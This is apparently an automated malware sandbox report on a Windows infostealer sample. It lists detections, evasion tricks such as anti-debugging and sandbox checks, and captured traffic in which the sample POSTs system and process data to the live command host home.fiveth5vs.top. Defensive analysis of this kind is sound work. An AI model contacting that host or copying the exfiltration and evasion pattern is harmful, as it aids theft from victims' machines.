Windows Analysis Report
ivHDHq51Ar.exe

Overview

General Information

Sample name: ivHDHq51Ar.exe
(renamed because the original name is a hash value)
Original sample name: 27b03055c39daab2ce7ae0c5a369f0f1.exe
Analysis ID: 1582697
MD5: 27b03055c39daab2ce7ae0c5a369f0f1
SHA1: 51c5eb4f2e29c659403437063502a061945265de
SHA256: f2d3aa2010aa17c79bd549f081efe1ef635b8e12ae150f200f8d2769b960bd4b
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create an SMB header
Detected non-DNS traffic on DNS port
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • ivHDHq51Ar.exe (PID: 1136 cmdline: "C:\Users\user\Desktop\ivHDHq51Ar.exe" MD5: 27B03055C39DAAB2CE7AE0C5A369F0F1)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched


AV Detection

Source: ivHDHq51Ar.exe | Avira: detected
Source: ivHDHq51Ar.exe | Virustotal: Detection: 43%
Source: ivHDHq51Ar.exe | ReversingLabs: Detection: 55%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: ivHDHq51Ar.exe | Joe Sandbox ML: detected
Source: ivHDHq51Ar.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: mov dword ptr [ebp+04h], 424D53FFh (0_2_001BA5B0)
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh (0_2_001BA7F0)
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: mov dword ptr [edi+04h], 424D53FFh (0_2_001BA7F0)
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: mov dword ptr [esi+04h], 424D53FFh (0_2_001BA7F0)
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: mov dword ptr [edi+04h], 424D53FFh (0_2_001BA7F0)
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: mov dword ptr [esi+04h], 424D53FFh (0_2_001BA7F0)
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh (0_2_001BA7F0)
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh (0_2_001BB560)
Source: ivHDHq51Ar.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_0015255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_001529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle
Source: global traffic | TCP traffic: 192.168.2.9:61633 -> 1.1.1.1:53
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1, Host: httpbin.org, Accept: */*
Source: global trafficHTTP traffic detected: POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1Host: home.fiveth5vs.topAccept: */*Content-Type: application/jsonContent-Length: 501538Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 38 35 39 30 39 31 33 37 32 30 36 37 38 33 37 37 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 
22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 2
Source: global traffic | HTTP traffic detected: GET /KhxTILlSHLygUudVWlQk1735537737?argument=0 HTTP/1.1, Host: home.fiveth5vs.top, Accept: */*
Source: global traffic | HTTP traffic detected: POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1, Host: home.fiveth5vs.top, Accept: */*, Content-Type: application/json, Content-Length: 31; Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d; Data Ascii: { "id1": "0", "data": "Done1" }
Source: Joe Sandbox View | ASN Name: VANNINVENTURESGB VANNINVENTURESGB
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_0021A8C0 recvfrom
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1, Host: httpbin.org, Accept: */*
Source: global traffic | HTTP traffic detected: GET /KhxTILlSHLygUudVWlQk1735537737?argument=0 HTTP/1.1, Host: home.fiveth5vs.top, Accept: */*
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.fiveth5vs.top
Source: unknownHTTP traffic detected: POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1Host: home.fiveth5vs.topAccept: */*Content-Type: application/jsonContent-Length: 501538Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 38 35 39 30 39 31 33 37 32 30 36 37 38 33 37 37 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 
20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Tue, 31 Dec 2024 08:45:30 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Tue, 31 Dec 2024 08:45:32 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.css
Source: ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.jpg
Source: ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17
Source: ivHDHq51Ar.exe, 00000000.00000002.1635584991.0000000001496000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1607874627.0000000001496000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1607649425.0000000001496000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737
Source: ivHDHq51Ar.exe, 00000000.00000002.1635584991.0000000001496000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1607874627.0000000001496000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1607649425.0000000001496000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377374fd4
Source: ivHDHq51Ar.exe, 00000000.00000002.1635584991.0000000001496000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1607874627.0000000001496000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1607649425.0000000001496000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377376963
Source: ivHDHq51Ar.exe, 00000000.00000002.1635378127.000000000144E000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1635584991.0000000001484000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1607874627.0000000001484000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1607649425.0000000001481000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=0
Source: ivHDHq51Ar.exe, 00000000.00000002.1635378127.000000000144E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=000
Source: ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737http://home.fiveth5vs.top/KhxTILlSHLygUudVWl
Source: ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: ivHDHq51Ar.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: ivHDHq51Ar.exe, ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705

System Summary

Source: ivHDHq51Ar.exe | Static PE information: section name:
Source: ivHDHq51Ar.exe | Static PE information: section name: .idata
Source: ivHDHq51Ar.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_3_014EA9BD
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_001605B0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_00166FA0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_0018F100
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_0021B180
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_004DE050
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_004DA000
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_002200E0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_001B6210
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_0021C320
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_00220420
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_004A4410
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_0015E620
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_0021C770
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_004B6730
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_004D4780
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_001BA7F0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_0020C900
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_00164940
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_0015A960
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_0040AAC0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_00326AC0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_002E4B60
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_0040AB2C
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_0015CBB0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_004C8BF0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_004DCC90
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_004D4D40
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_00310D80
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_004CCD80
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_0046AE30
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_00174F70
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_0021EF90
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_00218F90
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_004A2F90
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_001610E6
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_004BD430
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_004C35B0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_004E17A0
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: String function: 001571E0 appears 40 times
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: String function: 0015CAA0 appears 59 times
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: String function: 00307220 appears 91 times
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: String function: 001950A0 appears 81 times
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: String function: 0016CD40 appears 63 times
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: String function: 0016CCD0 appears 53 times
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: String function: 0032CBC0 appears 85 times
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: String function: 00194F40 appears 277 times
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: String function: 001575A0 appears 543 times
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: String function: 00194FD0 appears 200 times
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: String function: 001573F0 appears 99 times
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: String function: 002344A0 appears 56 times
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: String function: 00195340 appears 34 times
Source: ivHDHq51Ar.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: ivHDHq51Ar.exe | Static PE information: Section: niwiuhuq ZLIB complexity 0.9945142804928989
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_0015255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Code function: 0_2_001529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: ivHDHq51Ar.exe | Virustotal: Detection: 43%
Source: ivHDHq51Ar.exe | ReversingLabs: Detection: 55%
Source: ivHDHq51Ar.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: ivHDHq51Ar.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\ivHDHq51Ar.exe | Section loaded: cryptbase.dll
